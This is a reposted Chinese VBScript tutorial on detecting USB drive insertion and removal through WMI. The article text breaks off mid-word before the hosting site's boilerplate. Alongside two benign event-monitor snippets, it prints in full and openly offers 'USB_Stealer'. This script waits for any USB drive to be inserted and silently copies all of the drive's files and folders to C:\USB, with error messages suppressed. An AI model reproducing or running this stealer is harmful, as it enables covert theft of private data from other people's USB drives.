用VBS检测U盘插入与弹出事件的代码
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| 可以说,对WMI的掌握程度的多少直接决定了你的VBS水平高低。看过网上普遍流传VBS版U盘小偷程序,基本上都是靠无限循环实现的,一点技术含量也没有,文章的末尾给出了我写的VBS版U盘小偷程序的下载地址。虽然用WMI也得无限循环,但是效率是不一样的。 使用WMI的Win32_VolumeChangeEvent类就可以实现,下面是示例代码,更详细的信息请参考MSND文档。 复制代码 代码如下: Const Configuration_Changed = 1 Const Device_Arrival = 2 Const Device_Removal = 3 Const Docking = 4 strComputer = "." Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" _ & strComputer & "\root\cimv2") Set colMonitoredEvents = objWMIService. _ ExecNotificationQuery( _ "Select * from Win32_VolumeChangeEvent") Do Set objLatestEvent = colMonitoredEvents.NextEvent Select Case objLatestEvent.EventType Case Device_Arrival WScript.Echo "U盘插入,盘符为" & _ objLatestEvent.DriveName Case Device_Removal WScript.Echo "U盘弹出,盘符为" & _ objLatestEvent.DriveName End Select Loop 我也写了一个U盘小偷程序,自以为比网上抄来抄去的代码要好,感兴趣的可以下载来看看。 复制代码 代码如下: ''========================================== ''Name : USB_Stealer ''Date : 2010/5/25 ''Author : Demon ''Copyright : Copyright (c) 2010 Demon ''E-Mail : still.demon@gmail.com ''QQ : 380401911 ''Website : http://demon.tw ''========================================== ''Option Explicit On Error Resume Next Const Target_Folder = "C:\USB" Call Main() Sub Main() On Error Resume Next Const Device_Arrival = 2 Const Device_Removal = 3 Const strComputer = "." Dim objWMIService, colMonitoredEvents, objLatestEvent Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" _ & strComputer & "\root\cimv2") Set colMonitoredEvents = objWMIService. _ ExecNotificationQuery( _ "Select * from Win32_VolumeChangeEvent") Do Set objLatestEvent = colMonitoredEvents.NextEvent Select Case objLatestEvent.EventType Case Device_Arrival Copy_File objLatestEvent.DriveName End Select Loop End Sub Sub Copy_File(Folder_Path) On Error Resume Next Dim fso,file,folder Set fso = CreateObject("scripting.filesystemobject") If Not fso.FolderExists(Target_Folder) Then fso.CreateFolder(Target_Folder) End If For Each file In fso.GetFolder(Folder_Path).Files file.Copy Target_Folder & "\" & file.Name,True Next For Each folder In fso.GetFolder(Folder_Path).SubFolders folder.Copy Target_Folder & "\" & folder.Name,True Next End Sub 鉴于很多人反映之前写的那篇在XP下无效,做了一下修改。说是修改,其实是直接复制粘贴脚本专家的代码。 复制代码 代码如下: strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set colEvents = objWMIService.ExecNotificationQuery _ ("Select * From __InstanceOperationEvent Within 10 Where " _ & "TargetInstance isa ''Win32_LogicalDisk''") Do While True Set objEvent = colEvents.NextEvent If objEvent.TargetInstance.DriveType = 2 Then Select Case objEvent.Path_.Class Case "__InstanceCreationEvent" Wscript.Echo "Drive " & objEvent.TargetInstance.DeviceId & _ " has been added." Case "__InstanceDeletionEvent" Wscript.Echo "Drive " & objEvent.TargetInstance.DeviceId & _ " has been removed." End Select End If Loop 参 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于用VBS检测U盘插入与弹出事件的代码的所有评论
